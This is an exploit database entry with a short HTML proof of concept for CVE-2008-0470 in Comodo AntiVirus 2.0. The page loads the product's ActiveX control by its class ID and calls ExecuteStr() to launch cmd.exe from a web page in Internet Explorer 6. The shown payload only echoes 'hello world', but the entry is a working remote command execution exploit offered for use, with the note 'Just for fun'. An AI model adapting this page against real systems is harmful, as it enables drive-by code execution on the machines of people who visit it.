Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution

Author: h07
type: remote
platform: windows
port: 
date_added: 2008-01-22  
date_updated: 2016-10-28  
verified: 1  
codes: OSVDB-40921;CVE-2008-0470  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4974.html  
<!--
Comodo AntiVirus 2.0 ExecuteStr() 0day Remote Command Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on:..
- Comodo AntiVirus Beta 2.0
- Microsoft Internet Explorer 6
Just for fun  ;)
-->

<html>
<object id="obj" classid="clsid:309F674D-E4D3-46BD-B9E2-ED7DFD7FD176"></object>

<script>
obj.ExecuteStr('cmd.exe', '/C echo "hello world" && pause');
</script>

</html>

# milw0rm.com [2008-01-23]